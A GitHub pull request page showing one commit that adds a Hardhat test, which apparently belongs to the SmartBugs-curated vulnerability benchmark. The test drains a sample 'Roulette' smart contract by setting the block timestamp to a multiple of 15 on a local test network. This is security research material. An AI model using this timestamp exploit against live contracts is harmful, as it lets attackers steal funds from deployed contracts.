Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add tests simulating sb-curated time manipulation attacks #22

Merged
merged 5 commits into from
Sep 5, 2024
Merged

Add tests simulating sb-curated time manipulation attacks #22

Changes from 1 commit
Commits
Show all changes
5 commits
Select commit Hold shift + click to select a range
edd3352
add ether_lotto exploit
mokita-j Sep 5, 2024
7e8a473
add roulette exploit
mokita-j Sep 5, 2024
0cab662
add timed_crowdsale exploit
mokita-j Sep 5, 2024
30aeea9
fix timed_crowdsale exploit
mokita-j Sep 5, 2024
f510e61
reset blockchain state before time manipulation
mokita-j Sep 5, 2024
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
Prev Previous commit
Next Next commit
add roulette exploit
  • Loading branch information
@mokita-j
mokita-j committed Sep 5, 2024
commit 7e8a473982959d0f1bb308c05fbbfa301fbf876d
43 changes: 43 additions & 0 deletions smartbugs-curated/0.4.x/test/time_manipulation/roulette_test.js
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,43 @@
const { loadFixture, time } = require('@nomicfoundation/hardhat-network-helpers');
const { expect } = require('chai');

describe('attack time_manipulation/roulette.sol', function () {
let owner, sig1, amount;
async function deployContracts() {
[owner, sig1] = await ethers.getSigners();

amount = ethers.parseEther("10");

const EtherLotto = await ethers.getContractFactory('contracts/dataset/time_manipulation/roulette.sol:Roulette');
const victim = await EtherLotto.connect(owner).deploy({value: amount});

return {victim};
}


it('exploit time manipulation vulnerability', async function () {
const {victim} = await loadFixture(deployContracts);
const victimBalanceBefore = await ethers.provider.getBalance(victim.target);
expect(victimBalanceBefore).to.equal(amount);

const sig1BalanceBefore = await ethers.provider.getBalance(sig1.address);

const blockBefore = await ethers.provider.getBlock();
const timestampBefore = blockBefore.timestamp;


const next = timestampBefore + 15 -(timestampBefore % 15);

await time.setNextBlockTimestamp(next);

const tx = await sig1.sendTransaction({
to: victim.target,
value: amount
});

const receipt = await tx.wait();

const sig1Balance = await ethers.provider.getBalance(sig1.address);
expect(sig1Balance).to.equal(sig1BalanceBefore - receipt.gasUsed * receipt.gasPrice + amount);
});
});